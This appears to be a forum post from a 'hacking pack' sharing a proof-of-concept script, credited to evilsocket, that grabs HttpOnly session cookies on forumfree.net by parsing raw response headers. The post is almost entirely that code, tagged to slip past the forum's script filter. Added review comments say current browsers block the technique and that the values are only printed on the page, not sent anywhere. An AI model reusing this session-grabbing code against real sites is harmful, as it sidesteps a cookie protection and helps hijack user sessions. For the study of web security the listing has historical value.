Titolo : All-In-One Hacking Pack v1
Proof of concept script per grabbare httponly cookies su forumfree.net

[code linenumbers=false]<scrphpbbt>
/*
ForumFree.net HTTPOnly Grabber PoC
by evilsocket

evilsocket@gmail.com
*/

/*
 * Creates an HTTP request object and sends a request to forumfree.net, then
 * prints two values: one taken from document.cookie and one taken from the
 * raw response headers.
 *
 * What the listing demonstrates: the HttpOnly flag only keeps a cookie out of
 * document.cookie. If the browser also exposes the Set-Cookie response header
 * to script, code already running in the site's origin can read the same
 * value from the header text instead.
 *
 * NOTE(review): the XMLHttpRequest specification now lists Set-Cookie and
 * Set-Cookie2 as forbidden response header names, so getAllResponseHeaders()
 * in current browsers does not return them. The listing is of historical
 * interest for browsers that predate that filtering.
 * NOTE(review): the precondition is script execution inside the forum's
 * origin, so the control that matters is output encoding / input filtering
 * on the site; HttpOnly is a second layer, not a replacement for it.
 */
var req = null;
/* Try the native object first, then the two legacy ActiveX ProgIDs. Each
   failure is swallowed on purpose so the next candidate is attempted. */
try { req = new XMLHttpRequest(); } catch ( e ) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch ( e ) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch ( e ) {}
/* The third argument (false) makes the request synchronous. If none of the
   three constructors above succeeded, req is still null at this point. */
req.open('GET', 'http://www.forumfree.net/', false);
req.send(null);

/* Reads the complete response header block as one string; the author's
   comment says this is where the HttpOnly cookies are obtained. */
var resp = req.getAllResponseHeaders();

/* Extracts cid and session id. The offsets (4 and 11) are hard-coded;
   presumably they match the cookie layout the author observed on the site,
   so this is illustrative slicing rather than a general cookie parser. */
var cid = document.cookie.substring(4,document.cookie.indexOf(';'));
var sid = resp.substring( resp.indexOf("session_id") + 11, resp.indexOf(";") );

/* The two values are only written into the current document; nothing in this
   listing sends them anywhere else. */
document.write( 'CID : ' + cid + '<br/>SID : ' + sid );
</scrphpbbt>[/code]ForumFree.net HTTPOnly Grabber PoC